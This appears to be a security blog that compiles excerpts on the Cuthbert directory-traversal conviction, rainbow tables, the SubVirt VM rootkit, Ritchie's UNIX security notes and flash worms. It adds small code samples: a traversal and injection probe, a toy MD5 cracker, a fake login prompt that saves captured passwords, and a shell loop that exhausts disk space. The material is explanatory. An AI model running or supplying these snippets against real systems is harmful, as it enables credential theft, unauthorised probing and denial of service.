security

Arrested for directory truncation

From Sol Terra’s [IP] Use the Dots, Go to Jail – that’s the law (Interesting People: 24 October 2005):

Today, Daniel Cuthbert was found guilty.

Daniel Cuthbert saw the devastating images of the tsunami disaster and decided to donate £30 via the website that had been hastily set up to process payments. He is a computer security consultant, regarded in his field as an expert and respected by colleagues and employers alike. He entered his full personal details (home address, phone number, name and full card details). He did not receive a confirmation of payment or a reference and became concerned, as he had had issues with fraud on his card on a previous occasion. He then ran a couple of very basic penetration tests. If they showed the site to be insecure, as he suspected, he would have contacted the authorities; he had nothing to gain from doing this for fun, nor from keeping to himself his suspicion that the site was a phishing operation funnelling the pledged money to someone somewhere in South America.

The first test he used was the ../../../ sequence (dot dot slash, three times). The ../ sequence is known as directory traversal; it moves you up one level in a directory hierarchy, and the triple sequence amounts to a directory traversal attack (DTA), moving up three levels. It is not a complete attack, as that would require a further command; it was merely a light “knock on the door”. The other test consisted of an apostrophe ( ‘ ). He was then satisfied that the site was safe, as he received no error messages in response to his queries, and went about his work duties. There were no warnings or dialogue boxes showing that he had accessed an unauthorised area.
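
Neither probe is exotic. Here is a minimal Python sketch of what Cuthbert’s two-minute test amounts to, with a hypothetical example.org URL standing in for the donation site; given the conviction above, bear in mind that sending even probes this gentle to a site you do not own was enough to fall foul of the UK’s Computer Misuse Act.

import urllib.error
import urllib.parse
import urllib.request

BASE = "http://www.example.org/cgi-bin/donate"  # hypothetical URL, not the real site

for probe in ["../../../", "'"]:
    url = BASE + "?page=" + urllib.parse.quote(probe)
    try:
        resp = urllib.request.urlopen(url, timeout=10)
        # A clean 200 with no error text reveals nothing either way.
        print(probe, "->", resp.status)
    except urllib.error.HTTPError as e:
        # A 500 suggests the input reached the filesystem or database
        # unsanitised; a 403 or 404 suggests it was filtered or rejected.
        print(probe, "->", e.code)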

20 days later he was arrested at his place of work and had his house searched. In the first part of his interview, he did not readily acknowledge his actions, but in the second half of the interview, he did. He was a little distraught and confused upon arrest, as anyone would be in that situation, and did not ask for a solicitor, as he maintained he had done nothing wrong. His tests were done in a two-minute timeframe, then forgotten about.

Arrested for directory truncation Read More »

Rainbow cracking is now a public service

From Robert Lemos’s Rainbow warriors crack password hashes (The Register: 10 November 2005):

Over the past two years, three security enthusiasts from the United States and Europe set a host of computers to the task of creating eleven enormous tables of data that can be used to look up common passwords. The tables – totaling 500GB – form the core data of a technique known as rainbow cracking, which uses vast dictionaries of data to let anyone reverse the process of creating hashes – the statistically unique codes that, among other duties, are used to obfuscate a user’s password. Last week, the trio went public with their service. Called RainbowCrack Online, the site allows anyone to pay a subscription fee and submit password hashes for cracking.

“Usually people think that a complex, but short, password is very secure, something like $FT%_3^,” said Travis, one of the founders of RainbowCrack Online, who asked that his last name not be used. “However, you will find that our tables handle that password quite easily.”
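
The economics behind that boast are easy to see in miniature. Real rainbow tables store hash chains built with reduction functions, trading lookup time for far less disk than a full dictionary; the plain lookup table below (a Python sketch, assuming unsalted MD5 hashes and a toy three-character maximum) nonetheless shows why a short password falls instantly once the precomputation is paid for. Salting, which modern password stores apply precisely to defeat such precomputation, is why services like this target unsalted hash types.

import hashlib
import itertools
import string

# Full printable-ASCII alphabet, so "complex" characters like $ % ^ are covered.
ALPHABET = string.ascii_letters + string.digits + string.punctuation
MAX_LEN = 3  # toy scale; 500GB of real tables reaches much longer passwords

# The expensive part, done once (the trio's two years of computation):
table = {}
for length in range(1, MAX_LEN + 1):
    for combo in itertools.product(ALPHABET, repeat=length):
        pw = "".join(combo)
        table[hashlib.md5(pw.encode()).hexdigest()] = pw

# After that, every submitted hash is a single dictionary lookup:
target = hashlib.md5(b"$F^").hexdigest()
print(table.get(target))  # -> $F^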

Rainbow cracking is now a public service Read More »

Banks have more to fear from internal attacks than external

From electricnews.net’s Internal security attacks affecting banks (The Register: 23 June 2005):

Internal security breaches at the world’s banks are growing faster than external attacks, as institutions invest in technology, instead of employee training.

According to the 2005 Global Security Survey, published by Deloitte Touche Tohmatsu, 35 per cent of respondents said that they had encountered attacks from inside their organisation within the last 12 months, up from 14 per cent in 2004. In contrast, only 26 per cent confirmed external attacks, compared to 23 per cent in 2004.

The report, which surveyed senior security officers from the world’s top 100 financial institutions, found that the incidence of phishing and pharming, two online scams which exploit human behaviour, is growing rapidly.

Banks have more to fear from internal attacks than external Read More »

Virtual-machine based rootkits

From Samuel T. King, Peter M. Chen, Yi-Min Wang, Chad Verbowski, Helen J. Wang, & Jacob R. Lorch’s “SubVirt: Implementing malware with virtual machines” [PDF] (IEEE Symposium on Security and Privacy: May 2006):

We evaluate a new type of malicious software that gains qualitatively more control over a system. This new type of malware, which we call a virtual-machine based rootkit (VMBR), installs a virtual-machine monitor underneath an existing operating system and hoists the original operating system into a virtual machine. Virtual-machine based rootkits are hard to detect and remove because their state cannot be accessed by software running in the target system. Further, VMBRs support general-purpose malicious services by allowing such services to run in a separate operating system that is protected from the target system. We evaluate this new threat by implementing two proof-of-concept VMBRs. We use our proof-of-concept VMBRs to subvert Windows XP and Linux target systems, and we implement four example malicious services using the VMBR platform. Last, we use what we learn from our proof-of-concept VMBRs to explore ways to defend against this new threat. We discuss possible ways to detect and prevent VMBRs, and we implement a defense strategy suitable for protecting systems against this threat. …

A major goal of malware writers is control, by which we mean the ability of an attacker to monitor, intercept, and modify the state and actions of other software on the system. Controlling the system allows malware to remain invisible by lying to or disabling intrusion detection software.

Control of a system is determined by which side occupies the lower layer in the system. Lower layers can control upper layers because lower layers implement the abstractions upon which upper layers depend. For example, an operating system has complete control over an application’s view of memory because the operating system mediates access to physical memory through the abstraction of per-process address spaces. Thus, the side that controls the lower layer in the system has a fundamental advantage in the arms race between attackers and defenders. If the defender’s security service occupies a lower layer than the malware, then that security service should be able to detect, contain, and remove the malware. Conversely, if the malware occupies a lower layer than the security service, then the malware should be able to evade the security service and manipulate its execution.

Because of the greater control afforded by lower layers in the system, both security services and rootkits have evolved by migrating to these layers. Early rootkits simply replaced user-level programs, such as ps, with trojan horse programs that lied about which processes were running. These user-level rootkits were detected easily by user-level intrusion detection systems such as TripWire [29], and so rootkits moved into the operating system kernel. Kernel-level rootkits such as FU [16] hide malicious processes by modifying kernel data structures [12]. In response, intrusion detectors also moved to the kernel to check the integrity of the kernel’s data structures [11, 38]. Recently, researchers have sought to hide the memory footprint of malware from kernel-level detectors by modifying page protections and intercepting page faults [43]. To combat such techniques, future detectors may reset page protections and examine the code of the page-fault handler. …

Our project, which is called SubVirt, shows how attackers can use virtual-machine technology to address the limitations of current malware and rootkits. We show how attackers can install a virtual-machine monitor (VMM) underneath an existing operating system and use that VMM to host arbitrary malicious software. The resulting malware, which we call a virtual-machine based rootkit (VMBR), exercises qualitatively more control than current malware, supports general-purpose functionality, yet can completely hide all its state and activity from intrusion detection systems running in the target operating system and applications. …

A virtual-machine monitor is a powerful platform for malware. A VMBR moves the targeted system into a virtual machine then runs malware in the VMM or in a second virtual machine. The targeted system sees little to no difference in its memory space, disk space, or execution (depending on how completely the machine is virtualized). The VMM also isolates the malware’s state and events completely from those of the target system, so software in the target system cannot see or modify the malicious software. At the same time, the VMM can see all state and events in the target system, such as keystrokes, network packets, disk state, and memory state. A VMBR can observe and modify these states and events—without its own actions being observed—because it completely controls the virtual hardware presented to the operating system and applications. Finally, a VMBR provides a convenient platform for developing malicious services. A malicious service can benefit from all the conveniences of running in a separate, general-purpose operating system while remaining invisible to all intrusion detection software running in the targeted system. In addition, a malicious service can use virtual-machine introspection to understand the events and states taking place in the targeted system. …

A VMBR runs beneath the existing (target) operating system and its applications (Figure 2 in the paper). To accomplish this, a VMBR must insert itself beneath the target operating system and run the target OS as a guest. To insert itself beneath an existing system, a VMBR must manipulate the system boot sequence to ensure that the VMBR loads before the target operating system and applications. After the VMBR loads, it boots the target OS using the VMM. As a result, the target OS runs normally, but the VMBR sits silently beneath it.

To install a VMBR on a computer, an attacker must first gain access to the system with sufficient privileges to modify the system boot sequence. There are numerous ways an attacker can attain this privilege level. For example, an attacker could exploit a remote vulnerability, fool a user into installing malicious software, bribe an OEM or vendor, or corrupt a bootable CD-ROM or DVD image present on a peer-to-peer network. On many systems, an attacker who attains root or Administrator privileges can manipulate the system boot sequence. On other systems, an attacker must execute code in kernel mode to manipulate the boot sequence. We assume the attacker can run arbitrary code on the target system with root or Administrator privileges and can install kernel modules if needed. …

VMBRs use a separate attack OS to deploy malware that is invisible from the perspective of the target OS but is still easy to implement. None of the states or events of the attack OS are visible from within the target OS, so any code running within an attack OS is effectively invisible. The ability to run invisible malicious services in an attack OS gives intruders the freedom to use user-mode code with less fear of detection.

We classify malicious services into three categories: those that need not interact with the target system at all, those that observe information about the target system, and those that intentionally perturb the execution of the target system. In the remainder of this section, we discuss how VMBRs support each class of service.

The first class of malicious service does not communicate with the target system. Examples of such services are spam relays, distributed denial-of-service zombies, and phishing web servers. A VMBR supports these services by allowing them to run in the attack OS. This provides the convenience of user-mode execution without exposing the malicious service to the target OS.

The second class of malicious service observes data or events from the target system. VMBRs enable stealthy logging of hardware-level data (e.g., keystrokes, network packets) by modifying the VMM’s device emulation software. This modification does not affect the virtual devices presented to the target OS. For example, a VMBR can log all network packets by modifying the VMM’s emulated network card. These modifications are invisible to the target OS because the interface to the network card does not change, but the VMBR can still record all network packets. …

The third class of malicious service deliberately modifies the execution of the target system. For example, a malicious service could modify network communication, delete e-mail messages, or change the execution of a target application. A VMBR can customize the VMM’s device emulation layer to modify hardware-level data. A VMBR can also modify data or execution within the target through virtual-machine introspection.

Using our proof-of-concept VMBRs, we developed four malicious services that represent a range of services a writer of malicious software may want to deploy. We implemented a phishing web server, a keystroke logger, a service that scans the target file system looking for sensitive files, and a defense countermeasure that defeats a current virtual-machine detector. …

To avoid being removed, a VMBR must protect its state by maintaining control of the system. As long as the VMBR controls the system, it can thwart any attempt by the target to modify the VMBR’s state. The VMBR’s state is protected because the target system has access only to the virtual disk, not the physical disk.

The only time the VMBR loses control of the system is in the period of time after the system powers up until the VMBR starts. Any code that runs in this period can access the VMBR’s state directly. The first code that runs in this period is the system BIOS. The system BIOS initializes devices and chooses which medium to boot from. In a typical scenario, the BIOS will boot the VMBR, after which the VMBR regains control of the system. However, if the BIOS boots a program on an alternative medium, that program can access the VMBR’s state.

Because VMBRs lose control when the system is powered off, they may try to minimize the number of times full system power-off occurs. The events that typically cause power cycles are reboots and shutdowns. VMBRs handle reboots by restarting the virtual hardware rather than resetting the underlying physical hardware. By restarting the virtual hardware, VMBRs provide the illusion of resetting the underlying physical hardware without relinquishing control. Any alternative bootable medium used after a target reboot will run under the control of the VMBR.

In addition to handling target reboots, VMBRs can also emulate system shutdowns such that the system appears to shut down, but the VMBR remains running on the system. We use ACPI sleep states [3] to emulate system shutdowns and to avoid system power-downs. ACPI sleep states are used to switch hardware into a low-power mode. This low-power mode includes spinning down hard disks, turning off fans, and placing the monitor into a power-saving mode. All of these actions make the computer appear to be powered off. Power is still applied to RAM, so the system can come out of ACPI sleep quickly with all memory state intact. When the user presses the power button to “power-up” the system, the computer comes out of the low-power sleep state and resumes the software that initiated the sleep. Our VMBR leverages this low-power mode to make the system appear to be shut down; when the user “powers-up” the system by pressing the power button, the VMBR resumes. If the user attempts to boot from an alternative medium at this point, it will run under the control of the VMBR. We implemented shutdown emulation for our VMware-based VMBR. …

We first measure the disk space required to install the VMBR. Our Virtual PC-based VMBR image is 106 MB compressed and occupies 251 MB of disk space when uncompressed. Our VMware-based VMBR image is 95 MB compressed and occupies 228 MB of disk space uncompressed. The compressed VMBR images take about 4 minutes to download on a 3 Mb/s cable modem connection and occupy only a small fraction of the total disk space present on modern systems. …

The installation measurements include the time it takes to uncompress the attack image, allocate disk blocks, store the attack files, and modify the system boot sequence. Installation time for the VMware-based VMBR is 24 seconds. Installation for the Virtual PC-based VMBR takes longer (262 seconds) because the hardware used for this test is much slower and has less memory. In addition, when installing a VMBR underneath Windows XP, we swap the contents of the disk blocks used to store the VMBR with those in the beginning of the Windows XP disk partition, and these extra disk reads/writes further lengthen the installation time.

We next measure boot time, which we define as the amount of time it takes for an OS to boot and reach an initial login prompt. Booting a target Linux system without a VMBR takes 53 seconds. After installing the VMware-based VMBR, booting the target system takes 74 seconds after a virtual reboot and 96 seconds after a virtual shutdown. It takes longer after a virtual shutdown than after a virtual reboot because the VMM must re-initialize the physical hardware after coming out of ACPI sleep. In the uncommon case that power is removed from the physical system, the host OS and VMM must boot before loading the target Linux OS. The VMware-based VMBR takes 52 seconds to boot the host OS and load the VMM and another 93 seconds to boot the target Linux OS. We speculate that it takes longer to boot the target OS after full system power-down than after a virtual reboot because some performance optimizations within the VMware VMM take time to warm up.

Booting a target Windows XP system without a VMBR takes 23 seconds. After installing the Virtual PC-based VMBR, booting the target system takes 54 seconds after a virtual reboot. If power is removed from the physical system, the Virtual PC-based VMBR takes 45 seconds to boot the host OS and load the VMM and another 56 seconds to boot the target Windows XP OS. …

Despite using specialized guest drivers, our current proof-of-concept VMBRs use virtualized video cards which may not export the same functionality as the underlying physical video card. Thus, some high-end video applications, like 3D games or video editing applications, may experience degraded performance.

The physical memory allocated to the VMM and attack OS is a small percentage of the total memory on the system (roughly 3%) and thus has little performance impact on a target OS running above the VMBR. …

In this section, we explore techniques that can be used to detect the presence of a VMBR. VMBRs are fundamentally more difficult to detect than traditional malware because they virtualize the state seen by the target system and because an ideal VMBR modifies no state inside the target system. Nonetheless, a VMBR does leave signs of its presence that a determined intrusion detection system can observe. We classify the techniques that can be used to detect a VMBR by whether the detection system is running below the VMBR, or above the VMBR (i.e., within the target system). …

There are various ways to gain control below the VMBR. One way to gain control below the VMBR is to use secure hardware. Intel’s LaGrande [25], AMD’s platform for trustworthy computing [2], and Copilot [36] all propose hardware that can be used to develop and deploy low-layer security software that would run beneath a VMBR.

Another way to gain control below the VMBR is to boot from a safe medium such as a CD-ROM, USB drive or network boot server. This boot code can run on the system before the VMBR loads and can view the VMBR’s quiescent disk state. …

A third way to gain control below the VMBR is to use a secure VMM [17]. Like alternative bootable media, secure VMMs gain control of the system before the operating system boots. Running a secure VMM does not by itself stop a VMBR, as a VMBR can still insert itself between the VMM and the operating system. However, a secure VMM does retain control over the system as it runs and could easily add a check to stop a VMBR from modifying the boot sequence above the secure VMM. …

There are several reasons why traditional techniques (e.g., having the target system scan memory or disk) may not be able to detect a VMBR. First, the target system is confined to its virtual machine. Since the VMBR stores its state outside that virtual machine, the target system will see no suspicious changes in its own state. Second, even if the target system did see something amiss, the VMBR could tamper with the execution of the detector and force it to report incorrect results. …

A fundamental perturbation of the VMBR is that it uses machine resources such as CPU time, memory and disk space, and possibly network bandwidth. A VMBR adds CPU overhead to trap and emulate privileged instructions, as well as to run any malicious services. …

In addition to CPU overhead, a VMBR uses memory and disk space. A detector can detect this overhead by running a program that requires the entire machine’s memory or disk space. A VMBR can hide its space overhead in several ways. It can hide its memory overhead by mapping target pages with the same contents to the same physical page [47] or by paging some data to disk. While this extra paging activity may increase the running time of the program, the memory overhead of VMware was too small to measure in our tests. A VMBR can hide its disk overhead by compressing a portion of the disk, sharing disk blocks with the same contents, or pretending that the disk space it uses has bad sectors. …
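
As a crude illustration of the disk-space variant, a detector could compare the drive’s true capacity, known out of band from the drive’s label or invoice, with what the running system reports. The sketch below is assumption-laden (the expected figure is hypothetical, and filesystem metadata and partitioning overhead already account for some gap), and a VMBR can lie at exactly this interface, as the paragraph above notes.

import shutil

# Known-good physical capacity, supplied out of band (drive label, vendor
# spec sheet); hypothetical value for a nominal "500 GB" drive.
EXPECTED_DISK_BYTES = 500_107_862_016

visible = shutil.disk_usage("/").total
missing = EXPECTED_DISK_BYTES - visible
print(f"visible: {visible:,} bytes, unaccounted for: {missing:,}")
# A ~228 MB VMware-based VMBR (per the measurements quoted earlier) would
# surface here, unless it compresses, shares blocks, or fakes bad sectors.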

Another type of perturbation is caused by the variety of I/O devices on the computer. Recall that a VMM typically virtualizes all I/O devices. However, virtualizing the I/O device without changing the target’s view of the device requires one to understand the interface and semantics of each device. This is a formidable task, given the wide variety of I/O devices present on today’s computing platforms. Instead, current VMMs emulate a small number of virtual devices (often with customized interfaces to improve performance [1, 34]). The target OS must then use the drivers for the emulated virtual devices. …

A final source of perturbation is the imperfect virtualization of today’s x86 processors. Sensitive, non-privileged instructions like sidt leak information about the VMM yet do not trap to the VMM [31, 37]. …

We expect future enhancements to the x86 platform to reduce these perturbations. Upcoming virtualization support from Intel [45] and AMD [7] will enable more efficient virtualization. These enhancements eliminate sensitive, non-privileged instructions so they cannot be used from the CPU’s user-mode to detect the presence of a VMM. These enhancements may also accelerate transitions to and from the VMM, and this may reduce the need to run specialized guest drivers. …

However, VMBRs have a number of disadvantages compared to traditional forms of malware: they tend to have more state, be more difficult to install, require a reboot before they can run, and have more of an impact on the overall system. Although VMBRs do offer greater control over the compromised system, the cost of this higher level of control may not be justified for all malicious applications.

Virtual-machine based rootkits Read More »

The inventor of UNIX on its security … or lack thereof

From Dennis M. Ritchie’s “On the Security of UNIX”:

The first fact to face is that UNIX was not developed with security, in any realistic sense, in mind; this fact alone guarantees a vast number of holes. (Actually the same statement can be made with respect to most systems.) The area of security in which UNIX is theoretically weakest is in protecting against crashing or at least crippling the operation of the system. The problem here is not mainly in uncritical acceptance of bad parameters to system calls – there may be bugs in this area, but none are known – but rather in lack of checks for excessive consumption of resources. Most notably, there is no limit on the amount of disk storage used, either in total space allocated or in the number of files or directories. Here is a particularly ghastly shell sequence guaranteed to stop the system:

while : ; do
mkdir x
cd x
done

Either a panic will occur because all the i-nodes on the device are used up, or all the disk blocks will be consumed, thus preventing anyone from writing files on the device. …

The picture is considerably brighter in the area of protection of information from unauthorized perusal and destruction. Here the degree of security seems (almost) adequate theoretically, and the problems lie more in the necessity for care in the actual use of the system. …

It must be recognized that the mere notion of a super-user is a theoretical, and usually practical, blemish on any protection scheme. …

On the issue of password security, UNIX is probably better than most systems. Passwords are stored in an encrypted form which, in the absence of serious attention from specialists in the field, appears reasonably secure, provided its limitations are understood. … We have observed that users choose passwords that are easy to guess: they are short, or from a limited alphabet, or in a dictionary. Passwords should be at least six characters long and randomly chosen from an alphabet which includes digits and special characters.
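
The arithmetic behind that advice is quick to check. A sketch, assuming the full 95-character printable-ASCII alphabet and an illustrative guess rate (the achievable rate against 1970s crypt() would differ):

# Search-space arithmetic behind Ritchie's password advice.
ALPHABET = 95  # printable ASCII: letters, digits, special characters
GUESSES_PER_SEC = 1_000  # illustrative assumption, not a measured figure

for length in (4, 6, 8):
    space = ALPHABET ** length
    years = space / GUESSES_PER_SEC / (3600 * 24 * 365)
    print(f"{length} chars: {space:.2e} candidates, ~{years:,.1f} years to exhaust")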

Of course there also exist feasible non-cryptanalytic ways of finding out passwords. For example: write a program which types out login: on the typewriter and copies whatever is typed to a file of your own. Then invoke the command and go away until the victim arrives. …
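
That attack is a handful of lines in any language. A minimal sketch of the idea in Python rather than the era’s C (the drop-file name and prompts are illustrative); the defense, then as now, is a trusted path to the genuine login program:

import getpass

# Mimic the system's login prompt on the terminal we were left running on.
user = input("login: ")
password = getpass.getpass("Password: ")  # suppress echo, like the real thing

# Copy the capture to "a file of your own", as Ritchie puts it.
with open("stolen.txt", "a") as f:
    f.write(f"{user}:{password}\n")

# Fail convincingly: the victim assumes a typo, and the real login,
# which runs next, accepts the retry.
print("Login incorrect")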

The fact that users can mount their own disks and tapes as file systems can be another way of gaining super-user status. Once a disk pack is mounted, the system believes what is on it. Thus one can take a blank disk pack, put on it anything desired, and mount it. There are obvious and unfortunate consequences. For example: a mounted disk with garbage on it will crash the system; one of the files on the mounted disk can easily be a password-free version of su; other files can be unprotected entries for special files. The only easy fix for this problem is to forbid the use of mount to unprivileged users. A partial solution, not so restrictive, would be to have the mount command examine the special file for bad data, set-UID programs owned by others, and accessible special files, and balk at unprivileged invokers.

The inventor of UNIX on its security … or lack thereof Read More »

The math behind Flash Worms

From Stuart Staniford, David Moore, Vern Paxson, & Nicholas Weaver’s “The Top Speed of Flash Worms” [PDF] (29 October 2004):

Flash worms follow a precomputed spread tree using prior knowledge of all systems vulnerable to the worm’s exploit. In previous work we suggested that a flash worm could saturate one million vulnerable hosts on the Internet in under 30 seconds [18]. We grossly over-estimated.

In this paper, we revisit the problem in the context of single packet UDP worms (inspired by Slammer and Witty). Simulating a flash version of Slammer, calibrated by current Internet latency measurements and observed worm packet delivery rates, we show that a worm could saturate 95% of one million vulnerable hosts on the Internet in 510 milliseconds. A similar worm using a TCP based service could 95% saturate in 1.3 seconds. …

Since Code Red in July 2001 [11], worms have been of great interest in the security research community. This is because worms can spread so fast that existing signature-based anti-virus and intrusion-prevention defenses risk being irrelevant; signatures cannot be manually generated fast enough …

The premise of a flash worm is that a worm releaser has somehow acquired a list of vulnerable addresses, perhaps by stealthy scanning of the target address space or perhaps by obtaining a database of parties to the vulnerable protocol. The worm releaser, in advance, computes an efficient spread tree and encodes it in the worm. This allows the worm to be far more efficient than a scanning worm; it does not make large numbers of wild guesses for every successful infection. Instead, it successfully infects on most attempts. This makes it less vulnerable to containment defenses based on looking for missed connections [7, 16, 24], or too many connections [20, 25]. …

A difficulty for the flash worm releaser is a lack of robustness if the list of vulnerable addresses is imperfect. Since it is assembled in advance, and networks constantly change, the list is likely to be more-or-less out of date by the time of use. This has two effects. Firstly, a certain proportion of actually vulnerable and reachable machines may not be on the list, thus preventing the worm from saturating as fully as otherwise possible. More seriously, some addresses on the list may not be vulnerable. If such nodes are near the base of the spread tree, they may prevent large numbers of vulnerable machines from being infected by the worm. Very deep spread trees are particularly prone to this. Thus in thinking about flash worms, we need to explore the issue of robustness as well as speed. …

The Slammer worm [10, 22] of January 2003 was the fastest scanning worm to date by far and is likely close to the lower bound on the size of a worm. Data on observed Slammer infections (and on those of the similar Witty worm) provide us with estimates for packet rate and minimum code size in future flash worms. Slammer infected Microsoft’s SQL server. A single UDP packet served as exploit and worm and required no acknowledgment. The size of the data was 376 bytes, giving a 404 byte IP packet. This consisted of the following sections:

• IP header
• UDP header
• Data to overflow buffer and gain control
• Code to find the addresses of needed functions
• Code to initialize a UDP socket
• Code to seed the pseudo-random number generator
• Code to generate a random address
• Code to copy the worm to the address via the socket …

In this paper, we assume that the target vulnerable population is N = 1,000,000 (one million hosts, somewhat larger than the 360,000 infected by Code Red [11]). Thus in much less than a second, the initial host can directly infect a first generation of roughly 5,000 – 50,000 intermediate nodes, leaving each of those with only 20 – 200 hosts to infect to saturate the population. There would be no need for a third layer in the tree.

This implies that the address list for the intermediate hosts can fit in the same packet as the worm; 200 addresses only consumes 800 bytes. A flash version of Slammer need only be slightly different than the original: the address list of nodes to be infected would be carried immediately after the end of the code, and the final loop could traverse that list sending out packets to infect it (instead of generating pseudo-random addresses). …
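
The tree arithmetic in the last two paragraphs is compact enough to check directly (a sketch reproducing the text’s own figures):

# Two-level spread-tree arithmetic for a flash worm.
N = 1_000_000  # vulnerable population

for first_gen in (5_000, 50_000):
    per_node = N // first_gen  # hosts each intermediate must infect
    list_bytes = per_node * 4  # one IPv4 address is 4 bytes
    print(f"{first_gen} intermediates: {per_node} targets each, "
          f"a {list_bytes}-byte address list per worm packet")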

The graph indicates clearly that such flash worms can indeed be extraordinarily fast, infecting 95% of hosts in 510ms, and 99% in 1.2s. There is a long tail at the end due to the long tail in Internet latency data; some parts of the Internet are poorly connected and take a few seconds to reach. …

Can these results be extended to TCP services? If so, then our results are more grave; TCP offers worm writers a wealth of additional services to exploit. In this section we explore these issues. We conclude that top-speed propagation is viable for TCP worms, too, at the cost of an extra round-trip in latency to establish the connection and double the bandwidth if we want to quickly recover from loss. …

We believe a TCP worm could be written to be not much larger than Slammer. In addition to that 404 bytes, it needs a few more ioctl calls to set up a low level socket to send crafted SYN packets, and to set up a separate thread to listen for SYN-ACKs and send out copies of the worm. We estimate 600 bytes total. Such a worm could send out SYNs at line rate, confident that the SYN-ACKs would come back slower due to latency spread. The initial node can maintain a big enough buffer for the SYN-ACKs and the secondary nodes only send out a small number of SYNs. Both will likely be limited by the latency of the SYN-ACKs returning rather than the small amount of time required to deliver all the worms at their respective line rates.

To estimate the performance of such a small TCP flash worm, we repeated the Monte Carlo simulation we performed for the UDP worm with the latency increased by a factor of three for the handshake and the outbound delivery rates adjusted for 40 byte SYN packets. The results are shown in Figure 6. This simulation predicts 95% compromise after 1.3s, and 99% compromise after 3.3s. Thus TCP flash worms are a little slower than UDP ones because of the handshake latency, but can still be very fast. …

It appears that the optimum solution for the attacker – considering the plausible near-term worm defenses – is for a flash worm author to simply ignore the defenses and concentrate on making the worm as fast and reliable as possible, rather than slowing the worm to avoid detection. Any system behind a fully working defense can simply be considered as resistant, which the worm author counters by using the resiliency mechanisms outlined in the previous sections, combined with optimizing for minimum infection time.

Thus, for the defender, the current best hope is to keep the list of vulnerable addresses out of the hands of the attacker. …

The fastest worm seen in the wild so far was Slammer [10]. That was a random scanning worm, but saturated over 90% of vulnerable machines in under 10 minutes, and appears to have mainly been limited by bandwidth. The early exponential spread had an 8.5s time constant.

In this paper, we performed detailed analysis of how long a flash worm might take to spread on the contemporary Internet. These analyses use simulations based on actual data about Internet latencies and observed packet delivery rates by worms. Flash worms can complete their spread extremely quickly – with most infections occurring in much less than a second for single packet UDP worms and only a few seconds for small TCP worms. Anyone designing worm defenses needs to bear these time factors in mind.

The math behind Flash Worms Read More »

An overview of Flash Worms

From Stuart Staniford, Gary Grim, & Roelof Jonkman’s “Flash Worms: Thirty Seconds to Infect the Internet” (Silicon Defense: 16 August 2001):

In a recent very ingenious analysis, Nick Weaver at UC Berkeley proposed the possibility of a Warhol Worm that could spread across the Internet and infect all vulnerable servers in less than 15 minutes (much faster than the hours or days seen in Worm infections to date, such as Code Red).

In this note, we observe that there is a variant of the Warhol strategy that could plausibly be used and that could result in all vulnerable servers on the Internet being infected in less than thirty seconds (possibly significantly less). We refer to this as a Flash Worm, or flash infection. …

For the well funded three-letter agency with an OC12 connection to the Internet, we believe a scan of the entire Internet address space can be conducted in a little less than two hours (we estimate about 750,000 SYN packets per second can be fit down the 622Mbps of an OC12, allowing for ATM/AAL framing of the 40 byte TCP segments). The return traffic will be smaller in size than the outbound. Faster links could scan even faster. …

Given that an attacker has the determination and foresight to assemble a list of all or most Internet connected addresses with the relevant service open, a worm can spread most efficiently by simply attacking addresses on that list. There are about 12 million web servers on the Internet (according to Netcraft), so the size of that particular address list would be 48MB, uncompressed. …
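
Both headline numbers fall straight out of the stated assumptions (a sketch reproducing the text’s figures):

# Scan-time and list-size arithmetic from the text.
SYN_PER_SEC = 750_000  # fits in an OC12's 622 Mbps with ATM/AAL framing
hours = 2 ** 32 / SYN_PER_SEC / 3600
print(f"full IPv4 sweep: {hours:.2f} hours")  # ~1.59, "a little less than two"

WEB_SERVERS = 12_000_000  # Netcraft's count at the time
print(f"target list: {WEB_SERVERS * 4 / 1_000_000:.0f} MB uncompressed")  # 48 MB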

In conclusion, we argue that a small worm that begins with a list including all likely vulnerable addresses, and that has initial knowledge of some vulnerable sites with high-bandwidth links, can infect almost all vulnerable servers on the Internet in less than thirty seconds.

An overview of Flash Worms Read More »

Prices for zombies in the Underground

From Byron Acohido and Jon Swartz’s “Going price for network of zombie PCs: $2,000-$3,000” (USA TODAY: 8 September 2004):

In the calculus of Internet crime, two of the most sought-after commodities are zombie PCs and valid e-mail addresses.

One indication of the going rate for zombie PCs comes from a June 11 posting on SpecialHam.com, an electronic forum for spammers. The asking price for use of a network of 20,000 zombie PCs: $2,000 to $3,000. …

To put a zombie network to work, an attacker needs a list of targets in the form of e-mail addresses. Lists can be purchased from specialists who “harvest” anything that looks like an e-mail address from Web sites, news groups, chat rooms and subscriber lists. Compiled on CDs, such lists cost as little as $5 per million e-mail addresses. But you get what you pay for: Many CD entries tend to be either obsolete or “spam traps” — addresses seeded across the Internet by spam-filtering companies to identify, and block, spammers.

Valid e-mail addresses command a steep price. In June, authorities arrested a 24-year-old America Online engineer, Jason Smathers, and charged him with stealing 92 million AOL customer screen names and selling them to a spammer for $100,000.

Prices for zombies in the Underground Read More »

Ballmer says Windows is more secure than Linux

From Steven J. Vaughan-Nichols’s “Longhorn ‘Wave’ Rolling In” (eWeek: 20 October 2004):

The questions led into a discussion of Linux, with Bittmann observing that there’s a market perception that Linux is more secure.

“It’s just not true,” Ballmer responded. “We’re more secure than the other guys. There are more vulnerabilities in Linux; it takes longer for Linux developers to fix security problems. It’s a good decision to go with Windows.”

Ballmer says Windows is more secure than Linux Read More »

Steve Ballmer couldn’t fix an infected Windows PC

From David Frith’s “Microsoft takes on net nasties” (Australian IT: 6 June 2006):

MICROSOFT executives love telling stories against each other. Here’s one that platforms vice-president Jim Allchin told at a recent Windows Vista reviewers conference about chief executive Steve Ballmer.

It seems Steve was at a friend’s wedding reception when the bride’s father complained that his PC had slowed to a crawl and would Steve mind taking a look.

Allchin says Ballmer, the world’s 13th wealthiest man with a fortune of about $18 billion, spent almost two days trying to rid the PC of worms, viruses, spyware, malware and severe fragmentation without success.

He lumped the thing back to Microsoft’s headquarters and turned it over to a team of top engineers, who spent several days on the machine, finding it infected with more than 100 pieces of malware, some of which were nearly impossible to eradicate.

Among the problems was a program that automatically disabled any antivirus software.

“This really opened our eyes to what goes on in the real world,” Allchin told the audience.

If the man at the top and a team of Microsoft’s best engineers faced defeat, what chance do ordinary punters have of keeping their Windows PCs virus-free?

Steve Ballmer couldn’t fix an infected Windows PC Read More »

Search for “high score” told them who stole the PC

From Robert Alberti’s “more on Supposedly Destroyed Hard Drive Purchased In Chicago” (Interesting People mailing list: 3 June 2006):

